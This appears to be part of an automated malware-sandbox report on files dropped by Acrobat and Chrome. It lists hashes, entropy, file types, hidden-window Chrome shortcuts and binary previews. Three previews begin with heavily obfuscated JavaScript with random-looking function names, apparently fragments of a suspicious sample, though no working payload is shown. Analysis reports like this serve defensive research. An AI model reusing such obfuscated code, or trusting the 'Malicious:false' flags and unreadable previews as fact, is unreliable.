                            MD5:5C48B0AD2FEF800949466AE872E1F1E2
                            SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                            SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                            SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                            Malicious:false
                            Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                            Category:dropped
                            Size (bytes):758601
                            Entropy (8bit):7.98639316555857
                            Encrypted:false
                            SSDEEP:12288:bWNh3P6+Tegs6ZSWBlkipdjum21D1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:C3PDegfZS8lkipdj321DMNB1DofjgJJg
                            MD5:291F5A71A2768DA0DB77F5C756B884A5
                            SHA1:D171D9A496E79E9521260668E6847CB1D4892329
                            SHA-256:C34792A3F13D27A55CD32EBC1D1BD4C1676DC8F15187D7CB0E367BC25B506065
                            SHA-512:E718BC54EF9BEC3019B8B4AD27DBAF4724972C1DC047F9DFDCDC9312EFA64652E382FBAE9B2C04EC5C415A52240EFB8F2B47458D5C2E4639659559B24BA440D6
                            Malicious:false
                            Preview:...........].s..R/c..D@..\......3Z.....E.,...d{.k.~..H3....-......A...<>n.......X..Dp..d......f.{...9&F..........R.UW-..^..zC.kjOUUMm...nW...Z.7.J.R.....=*.R........4..(WCMQ..u]]R...R......5.*..N)].....!.-.d]M....7.......i..rmP...6A.Z .=..~..$C-..}..Mo.T......:._'.S....r.9....6.....r....#...<U@.Iiu..X].T x.j....x...:q.....j]P3......[.5]|..7;.5....^..7(.E..@..s...2..}..j....*...t.5J...6Rf..%P{2T^$Y.V.O9.W...4...\ .5............Q.&j....h.+.u......W...4f]..s..(...:....`.<W_...z*Bs|tF5 NI4.zD..5...u...!........M.0.K%F....,.c.....>R6..i..Am.y.~5..S....M...^......F.&..V...Z.......i....b....V..,.UH"...W...5}A.....KUT..=6jZ.....B...Z...Y(..u...=....x,2..."._Cf.....b...z7..... r..#.r..L9....2...R,..J?&..p..~.....3.=z...w..m..U..%._#<....r.....B.z..G..D.:4m.Z.&.N......</..Dz+.......vn.....;Qhk....!dw...A......3..a..K...).Q.`t[..)].6.%@....v.g.%E>;Z...uz.L..6Ct..O.Eo.O.e..........J.J$...:....K..)......F.....ZWE...z..5..g.io...l2[.,m9X..f......5|:bj[.._R{gi...^
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                            Category:dropped
                            Size (bytes):1419751
                            Entropy (8bit):7.976496077007677
                            Encrypted:false
                            SSDEEP:24576:/M7ouWLaGZjZwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:RuWLaGZjZwZGk3mlind9i4ufFXpAXkru
                            MD5:AE1E8A5D3E7B2198980A0CA16DE5F3D3
                            SHA1:A1DB2C58AFC81E6A114A8EB47BE0243956F79460
                            SHA-256:8C2E1B13F6658714D51737D6745FE065B87497923945AB3028706A4171C8328F
                            SHA-512:5B36CF0982C5AFED5CCEA4B30A0B31A2B5312FBF5438623D53153E076B59F1B4BEF8C08695EA74E086BCA4EF7221889DB977B5DCFF4C684BA0683FDDECDE2EC4
                            Malicious:false
                            Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                            Category:dropped
                            Size (bytes):1407294
                            Entropy (8bit):7.97605879016224
                            Encrypted:false
                            SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                            MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                            SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                            SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                            SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                            Malicious:false
                            Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 17 23:01:50 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                            Category:dropped
                            Size (bytes):2673
                            Entropy (8bit):3.966156233460863
                            Encrypted:false
                            SSDEEP:48:80dcTgoIHHidAKZdA1FehwiZUklqehTy+3:8Hngsy
                            MD5:814CB6C324A72FF6030115D3AF599EDF
                            SHA1:D1C9DEE7363A67D4B7F61C944AC235E9077BA50E
                            SHA-256:87286C00F8A0F8AC07F10FA476E3567E62B3E280B8BE088E6CECEB71C8619E85
                            SHA-512:87635E6151745F163641D2E91E6C99AFD5F68587C993000084CCE79D4DFE58DC56584BF5F5FED293CD6CD6E592A25F6F694EB059F891BD455AA889096EC78E34
                            Malicious:false
                            Preview:L..................F.@.. ...$+.,....\....P..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y(.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y8.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y8.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y8............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y:............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........X.b......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 17 23:01:50 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                            Category:dropped
                            Size (bytes):2675
                            Entropy (8bit):3.9855742843009097
                            Encrypted:false
                            SSDEEP:48:8MdcTgoIHHidAKZdA1seh/iZUkAQkqehcy+2:8Pn29Qxy
                            MD5:A0E1F15651BB2484DBC6053565A1D7C4
                            SHA1:4E9774AA25D2D2EE773046E8EB5AF7A6ED1592CC
                            SHA-256:92E431487B45B89FEA5BE5FD8EACDC3A5580D8DCA50F9C5885B98D9E548F59B3
                            SHA-512:B235074625D5EC5BE7BE212A69525BC409CA298DDB47EBD5E7650558E3399B515537FF793147E09F9E9CB3AAA6A79697D5456F1349CEA9858D0DA54293B0B9E3
                            Malicious:false
                            Preview:L..................F.@.. ...$+.,.........P..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y(.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y8.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y8.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y8............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y:............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........X.b......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                            Category:dropped
                            Size (bytes):2689
                            Entropy (8bit):3.996138850549693
                            Encrypted:false
                            SSDEEP:48:8ddcTgoAHHidAKZdA14meh7sFiZUkmgqeh7s6y+BX:8MnKnoy
                            MD5:9FA42EC3C8A842AC4CFEAE26C27E74EF
                            SHA1:66D83CB6F734066E5B2934E0518D9A807150F102
                            SHA-256:399E90359CE93984407B1EF241BB91933348A4022DB67E860046ECB725BAEA49
                            SHA-512:00DCAA4C4A6C49BEF4B7F1AB1941FB3F68C09CEDB63B7DB06A9CCAD8F97AACA14B0D905A89BD9010EFB422F433D6F1146120C3B52D6E066E4E2C07C4AA53C463
                            Malicious:false
                            Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y(.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y8.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y8.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y8............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........X.b......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 17 23:01:50 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                            Category:dropped
                            Size (bytes):2677
                            Entropy (8bit):3.9808073960294683
                            Encrypted:false
                            SSDEEP:48:8kdcTgoIHHidAKZdA1TehDiZUkwqehQy+R:8Xntiy
                            MD5:EAB5F02201BC01BF4FE964474F5AF57A
                            SHA1:CDEF7A03EC50A38ABAF0E58229E128E0CDB0D8E4
                            SHA-256:8F4B9A7696CB880970927DD27BFAB043268A09B0FE63AF64D964D79962F4B29E
                            SHA-512:B058FA43DD5896668EAFE297114F95362E28C8D01B9FC379F9F4C1AA9CAEFC3715086414F0FF2550850F974370D72352989B51EE9FF90E46DEEB5DB62AB2921D
                            Malicious:false
                            Preview:L..................F.@.. ...$+.,....&X...P..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y(.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y8.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y8.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y8............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y:............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........X.b......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 17 23:01:50 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                            Category:dropped
                            Size (bytes):2677
                            Entropy (8bit):3.9712047626890365
                            Encrypted:false
                            SSDEEP:48:8TdcTgoIHHidAKZdA1dehBiZUk1W1qehWy+C:8+nN92y
                            MD5:DAAEEDD33624065352FBA4E4300DA78C
                            SHA1:CEB454D2D1F29357999EACFC7EDA9100433684E3
                            SHA-256:056A95750A81FD185A3D95D296AF18032C8C58EF4F54D4FE0EFE8ACAA1D2EE57
                            SHA-512:2CA8E78246D83523B3798DADD3F3E4B5A974E048509A17BD1608DAB8C64C5B5B358D06F7786AF4B7D8D2C71D5E4C6E33400BF3DFF5D55E37FC9AF5973693658E
                            Malicious:false
                            Preview:L..................F.@.. ...$+.,....k....P..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y(.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y8.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y8.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y8............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y:............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........X.b......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 17 23:01:50 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                            Category:dropped
                            Size (bytes):2679
                            Entropy (8bit):3.979296365468017
                            Encrypted:false
                            SSDEEP:48:8SdcTgoIHHidAKZdA1duTeehOuTbbiZUk5OjqehOuTboy+yT+:85n1TfTbxWOvTboy7T
                            MD5:D0120CF4C72479B614ACDFEA16EB1F17
                            SHA1:6B54D3217EDD503EB87ABBD3F22B2D83D0D4B294
                            SHA-256:625314C4E4D8201B2774F9FB270E984C471EB6B229B912DC85C660D6A23FF867
                            SHA-512:256F69955B045865072469C3A5B39F6F92CBB77BE07F361AB95D7F294CE9739C537FC7074DB6BAFAF960A867651CFEE6055D16A95EB52B871F3FCB8C314A6176
                            Malicious:false
                            Preview:L..................F.@.. ...$+.,....E....P..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y(.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y8.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y8.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y8............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y:............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........X.b......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with very long lines (65536), with no line terminators
                            Category:dropped
                            Size (bytes):80379
                            Entropy (8bit):5.829899279256078
                            Encrypted:false
                            SSDEEP:384:A1V2VkcX2XbvBcH1JInta7SuHiBxwiwd1s+++z3DWAH6cMgHC:A1VwkuwbvBcIta7SuHiHwdcU6AH6xgi
                            MD5:70EED7F57219094A9A00181F453F83F1
                            SHA1:3979ADF54D055E8FF0CB8D6E84AEAA92395AF1CF
                            SHA-256:1E8A89684E88C33F6A794EE07498FC698A88D22CD14B35E6BC35F30AB3B5A69C
                            SHA-512:1BFBE5497B4949C5C3840FA3610D9944A7F9A976EECD531391430C900A78EB49E449913EF970A79CB51B6356E9ABFA894929CEF3FB0B35F2DFC17BFB33E5DEA6
                            Malicious:false
                            Preview:function _AVqwQCmohbEMzSuBTwQSmudSjgLHGgcyXMrklIVeqNunkObFlreXXSbCOtCxbFssAtYEAMpBQsEoBjsgThdEaEDFAcrZFsUuwHhjzmNiFtWayfhdzlmwPQiQusVPXCXlqDTNPxWlgEGtBXWGpZpjMhCZjpSQNxijjCAyrcdvpNVCPTVyxjfMSggHYmHVKfPjytWWppkGZrfsCTJsFqAoPVUqekXJNpOFPIGPCjphOqscwkkRGdspqSzbWPfclFQCLKZtrNRePnqTVEckUPEahWdBXRpPWGboTUWfpBdUxjAMXSNdUmJeXRGOKUHzspBQmZyOzgUNbCEPfUsvMBYFnVjcfJyuvHVZflYnqDXvvvlLienqXjcVQETcsXLtlhDUXgmfyHinuQGlgksRCqSDgFHbRgQiJTQADEYsotCDfLEwwcSGVxlwZxhnEOvZHKCSgeYAvwfZfPLkSjwBForKKwIMarhCuDOkBNmoGQjwmPBGzxQxLVwI253d(_AVqwQCmohbEMzSuBTwQSmudSjgLHGgcyXMrklIVeqNunkObFlreXXSbCOtCxbFssAtYEAMpBQsEoBjsgThdEaEDFAcrZFsUuwHhjzmNiFtWayfhdzlmwPQiQusVPXCXlqDTNPxWlgEGtBXWGpZpjMhCZjpSQNxijjCAyrcdvpNVCPTVyxjfMSggHYmHVKfPjytWWppkGZrfsCTJsFqAoPVUqekXJNpOFPIGPCjphOqscwkkRGdspqSzbWPfclFQCLKZtrNRePnqTVEckUPEahWdBXRpPWGboTUWfpBdUxjAMXSNdUmJeXRGOKUHzspBQmZyOzgUNbCEPfUsvMBYFnVjcfJyuvHVZflYnqDXvvvlLienqXjcVQETcsXLtlhDUXgmfyHinuQGlgksRCqSDgFHbRgQiJTQADEYsotCDfLEwwcSGVxlwZxhnEOvZHKCSgeYAvwfZfPLkSjwBForKKwIMarhCuDOkBNmo
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with very long lines (65536), with no line terminators
                            Category:dropped
                            Size (bytes):77807
                            Entropy (8bit):5.840527062340211
                            Encrypted:false
                            SSDEEP:384:WZNLZjZUZgZOZZN2ZNBZRZNuZNqZLZSZN1ZZ0ZNLZjZ8ZFZrZJZN/ZpZxZIZPZUw:fTSzpwsta7SuHiHwdcU6AH6xgi
                            MD5:26F75EC4BFB526488AC0693B1B08F0E1
                            SHA1:942E958E026D96227010EF75069A05AF417C4786
                            SHA-256:012781DC588EE679CDEA8F543B56EB1E782CEE442336ED54EC4265142020DA0C
                            SHA-512:2EBD56B8AEDEB99224DC6926F2CFF5A5E0EEB44FE8B6E47C7BC61B5D67CABC6B12166BE47FDA5AB137E7029FBC7EC13C271A321F952DB621E2EFB0B9F2DE14E6
                            Malicious:false
                            Preview:function _ivCbsPAiayncXDfoxGfhNeOaeyJXdRxqBahKcyhtQWMidwJenFRAZBwOfZFHiVUogumVjiCbaHfRwHhcFIYKRTcyVhARIvZwpRIPrjaqpmIzKxWqIROLlSFywRPeQneVrHCHvnMRDSgZbJGjatwKTTsLaRxGmBGjHtNgmVNKMBOVcyzXQAeoXXHHyYTtxAVBddiINtZJbverndWzuENebgOEnbwITmBGJLEOCxUmoAykyFzhPtNOkVQHQVQVXGJajJYetiEDWspaRSsyylFFHKymHefItLefUMjwqcNYSZQPpSwftYPInplzASjtEsHdpKmjpZdIqNeriYCiDLcpIMCAJSxurEVoIJiFUyfRfTPwXCbyAeGkwqoCdNDpvUVbmriOlwgYkbBuUPxMSUZfYJbbiKteayzzAElqCquXUFFITQWxGhzqYSFWBSERjEmerMofNFUMyEeljdblGNBSsbAxEJDZdaLasSontAfHRwgXVCcgdkUS25dc(_ivCbsPAiayncXDfoxGfhNeOaeyJXdRxqBahKcyhtQWMidwJenFRAZBwOfZFHiVUogumVjiCbaHfRwHhcFIYKRTcyVhARIvZwpRIPrjaqpmIzKxWqIROLlSFywRPeQneVrHCHvnMRDSgZbJGjatwKTTsLaRxGmBGjHtNgmVNKMBOVcyzXQAeoXXHHyYTtxAVBddiINtZJbverndWzuENebgOEnbwITmBGJLEOCxUmoAykyFzhPtNOkVQHQVQVXGJajJYetiEDWspaRSsyylFFHKymHefItLefUMjwqcNYSZQPpSwftYPInplzASjtEsHdpKmjpZdIqNeriYCiDLcpIMCAJSxurEVoIJiFUyfRfTPwXCbyAeGkwqoCdNDpvUVbmriOlwgYkbBuUPxMSUZfYJbbiKteayzzAElqCquXUFFITQWxGhzqYSFWBSERjEmerMofNFUMyEeljdblGNBSsbAxEJDZdaLasSon
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with very long lines (65536), with no line terminators
                            Category:dropped
                            Size (bytes):79324
                            Entropy (8bit):5.831133831803164
                            Encrypted:false
                            SSDEEP:768:Bvz2JOj2oDjMITRedfJeb+Fb/35WJMu+Jc1LZnpqtwx1btnpqSNn+tIn9dEFfRg0:KA6H9AH87
                            MD5:5AEE7D06041E4C840C72499E26D524FE
                            SHA1:4551A6EA35DD455078D12BCC1D9EBDE8CE113AA3
                            SHA-256:41BD3014E370D805F826421D45735A9618E771335B22B27C26DA06F38E6A9F64
                            SHA-512:7559457846CDBC6BC5690A9ACE65D0737B0F0E026C033CF6915CA4001964D37A05D2A1FBF795458CA37A5931771AED70EBBE74A31D7A0772D9823B8C5BEB6428
                            Malicious:false
                            Preview:(function(_lcwcRfSvhPYkHlmxVvwxQBvztYWRTTGIjIGhmiIvvVwpICOBGRHAwJTlaJdNjRUkMrBsfTAMIoYdwUUzTrbWovYlkyVimCNKXyZiWMqOrJQjCpzzJegubgqkxJtRwHiEybuxJUkkvuilQRgecBIJTBXJrTegzxYsJGdaDiFqytwdHCLLMSsKDoQqXDeuKHxUidHsfUjaGMrmsTypCHHrSXMrnUDgUkmtEAqFmEtiWKwaxLLURbyNOsPiDpIdcKUrTBoFOWoxSkBcEvHqdMEOlMsJFflXcwxKvkZAQcgvMfCTyuxGUCqyOSfCcvItXLbWsdXNGXuUeZxaOSROtJaRkPuprnzMpJfiIhfcUexYpYcTiSTbCZACBAhVVoKqTLpJfBmBHcGSrgdxmaCWiBHBSNUKLvfGlRvtNpkDthhIhpnwWwLlYZPQRTDspwMwlPQzcGUaThkUHBqXZAidNsRNzuCQIbTlnGIeToIPuzDugpjdIaVMlXUU4a449a,_lcwcRfSvhPYkHlmxVvwxQBvztYWRTTGIjIGhmiIvvVwpICOBGRHAwJTlaJdNjRUkMrBsfTAMIoYdwUUzTrbWovYlkyVimCNKXyZiWMqOrJQjCpzzJegubgqkxJtRwHiEybuxJUkkvuilQRgecBIJTBXJrTegzxYsJGdaDiFqytwdHCLLMSsKDoQqXDeuKHxUidHsfUjaGMrmsTypCHHrSXMrnUDgUkmtEAqFmEtiWKwaxLLURbyNOsPiDpIdcKUrTBoFOWoxSkBcEvHqdMEOlMsJFflXcwxKvkZAQcgvMfCTyuxGUCqyOSfCcvItXLbWsdXNGXuUeZxaOSROtJaRkPuprnzMpJfiIhfcUexYpYcTiSTbCZACBAhVVoKqTLpJfBmBHcGSrgdxmaCWiBHBSNUKLvfGlRvtNpkDthhIhpnwWwLlYZPQRTDspwMwlPQzcGUaThkUHBqXZAidNsRNzuCQIbTlnGIeT
